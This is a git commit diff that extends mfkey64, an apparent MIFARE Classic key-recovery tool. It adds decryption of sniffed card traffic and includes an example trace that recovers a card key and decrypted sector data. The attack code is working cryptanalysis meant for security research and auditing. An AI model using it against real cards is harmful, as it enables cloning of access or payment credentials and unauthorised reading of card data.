Merge pull request #168 from zhovner/master

mfkey64: Added optional decryption of communication using keystream
2025-08-14 02:26:59 -07:00 · 2016-04-03 21:55:54 +02:00 · 2016-04-03 21:55:54 +02:00 · 90858b95ad
commit 90858b95ad
parent d889dacc9d c36d994b32
2 changed files with 117 additions and 14 deletions
--- a/tools/mfkey/example_trace.txt
+++ b/tools/mfkey/example_trace.txt
@ -13,3 +13,67 @@

 ./mfkey64 9c599b32 82a4166c a1e458ce 6eea41e0 5cadf439

+
+
+### Communication decryption
+
+
+RDR	26
+TAG	04 00
+RDR	93 20
+TAG	14 57 9f 69 b5
+RDR	93 70 14 57 9f 69 b5 2e 51
+TAG	08 b6 dd
+RDR	60 14 50 2d
+TAG	ce 84 42 61
+RDR	f8 04 9c cb 05 25 c8 4f
+TAG	94 31 cc 40
+RDR	70 93 df 99
+TAG	99 72 42 8c e2 e8 52 3f 45 6b 99 c8 31 e7 69 dc ed 09
+RDR	8c a6 82 7b
+TAG	ab 79 7f d3 69 e8 b9 3a 86 77 6b 40 da e3 ef 68 6e fd
+RDR	c3 c3 81 ba
+TAG	49 e2 c9 de f4 86 8d 17 77 67 0e 58 4c 27 23 02 86 f4
+RDR	fb dc d7 c1
+TAG	4a bd 96 4b 07 d3 56 3a a0 66 ed 0a 2e ac 7f 63 12 bf
+RDR	9f 91 49 ea
+
+
+./mfkey64 14579f69 ce844261 f8049ccb 0525c84f 9431cc40 7093df99 9972428ce2e8523f456b99c831e769dced09 8ca6827b ab797fd369e8b93a86776b40dae3ef686efd c3c381ba 49e2c9def4868d1777670e584c27230286f4 fbdcd7c1 4abd964b07d3563aa066ed0a2eac7f6312bf 9f9149ea
+
+Recovering key for:
+  uid: 14579f69
+   nt: ce844261
+ {nr}: f8049ccb
+ {ar}: 0525c84f
+ {at}: 9431cc40
+{enc0}: 7093df99
+{enc1}: 9972428ce2e8523f456b99c831e769dced09
+{enc2}: 8ca6827b
+{enc3}: ab797fd369e8b93a86776b40dae3ef686efd
+{enc4}: c3c381ba
+{enc5}: 49e2c9def4868d1777670e584c27230286f4
+{enc6}: fbdcd7c1
+{enc7}: 4abd964b07d3563aa066ed0a2eac7f6312bf
+{enc8}: 9f9149ea
+
+LFSR succesors of the tag challenge:
+  nt': 76d4468d
+ nt'': d5f3c476
+
+Keystream used to generate {ar} and {at}:
+  ks2: 73f18ec2
+  ks3: 41c20836
+
+Decrypted communication:
+{dec0}: 3014a7fe
+{dec1}: c26935cfdb95c4b4a27a84b8217ae9e48217
+{dec2}: 30152eef
+{dec3}: 493167c536c30f8e220b09675687067d4b31
+{dec4}: 3016b5dd
+{dec5}: 493167c536c30f8e220b09675687067d4b31
+{dec6}: 30173ccc
+{dec7}: 0000000000007e178869000000000000c4f2
+{dec8}: 61148834
+
+Found Key: [091e639cb715]
--- a/tools/mfkey/mfkey64.c
+++ b/tools/mfkey/mfkey64.c
@ -6,6 +6,7 @@
 // Test-file: test2.c
 #include "crapto1.h"
 #include <stdio.h>
+#include <string.h>

 int main (int argc, char *argv[]) {
  struct Crypto1State *revstate;
@ -21,32 +22,50 @@ int main (int argc, char *argv[]) {
  printf("MIFARE Classic key recovery - based 64 bits of keystream\n");
  printf("Recover key from only one complete authentication!\n\n");

-  if (argc < 6) {
-    printf(" syntax: %s <uid> <nt> <{nr}> <{ar}> <{at}>\n\n",argv[0]);
+  if (argc < 6 ) {
+    printf(" syntax: %s <uid> <nt> <{nr}> <{ar}> <{at}> [enc] [enc...]\n\n", argv[0]);
    return 1;
  }

-  sscanf(argv[1],"%x",&uid);
-  sscanf(argv[2],"%x",&nt);
-  sscanf(argv[3],"%x",&nr_enc);
-  sscanf(argv[4],"%x",&ar_enc);
-  sscanf(argv[5],"%x",&at_enc);
+  int encc = argc - 6;
+  int enclen[encc];
+  uint8_t enc[encc][120]; 

+  sscanf(argv[1], "%x", &uid);
+  sscanf(argv[2], "%x", &nt);
+  sscanf(argv[3], "%x", &nr_enc);
+  sscanf(argv[4], "%x", &ar_enc);
+  sscanf(argv[5], "%x", &at_enc);
+  for (int i = 0; i < encc; i++) {
+    enclen[i] = strlen(argv[i + 6]) / 2;
+    for (int i2 = 0; i2 < enclen[i]; i2++) {
+      sscanf(argv[i+6] + i2*2,"%2x", (uint8_t*)&enc[i][i2]);
+    }
+  }
  printf("Recovering key for:\n");
-  printf("  uid: %08x\n",uid);
-  printf("   nt: %08x\n",nt);
-  printf(" {nr}: %08x\n",nr_enc);
-  printf(" {ar}: %08x\n",ar_enc);
-  printf(" {at}: %08x\n",at_enc);

-/*	
+  printf("  uid: %08x\n", uid);
+  printf("   nt: %08x\n", nt);
+  printf(" {nr}: %08x\n", nr_enc);
+  printf(" {ar}: %08x\n", ar_enc);
+  printf(" {at}: %08x\n", at_enc);
+  for (int i = 0; i < encc; i++) {
+      printf("{enc%d}: ", i);
+      for (int i2 = 0; i2 < enclen[i]; i2++) {
+          printf("%02x", enc[i][i2]);
+      }
+      printf("\n");
+  }
+
+
+  /*  
  uint32_t uid                = 0x9c599b32;
  uint32_t tag_challenge      = 0x82a4166c;
  uint32_t nr_enc             = 0xa1e458ce;
  uint32_t reader_response    = 0x6eea41e0;
  uint32_t tag_response       = 0x5cadf439;
 */
-	// Generate lfsr succesors of the tag challenge
+  // Generate lfsr succesors of the tag challenge
  printf("\nLFSR succesors of the tag challenge:\n");
  printf("  nt': %08x\n",prng_successor(nt, 64));
  printf(" nt'': %08x\n",prng_successor(nt, 96));
@ -59,6 +78,26 @@ int main (int argc, char *argv[]) {
  printf("  ks3: %08x\n",ks3);

  revstate = lfsr_recovery64(ks2, ks3);
+
+  // Decrypting communication using keystream if presented
+  if (argc > 6 ) {
+  printf("\nDecrypted communication:\n");
+  uint8_t ks4; 
+  int rollb = 0;
+  for (int i = 0; i < encc; i++) {
+    printf("{dec%d}: ", i);
+    for (int i2 = 0; i2 < enclen[i]; i2++) {  
+      ks4 = crypto1_byte(revstate, 0, 0);
+      printf("%02x", ks4 ^ enc[i][i2]);
+      rollb += 1;
+    }
+    printf("\n");
+  }
+  for (int i = 0; i < rollb; i++) {
+    lfsr_rollback_byte(revstate, 0, 0);
+    }
+  }
+  
  lfsr_rollback_word(revstate, 0, 0);
  lfsr_rollback_word(revstate, 0, 0);
  lfsr_rollback_word(revstate, nr_enc, 1);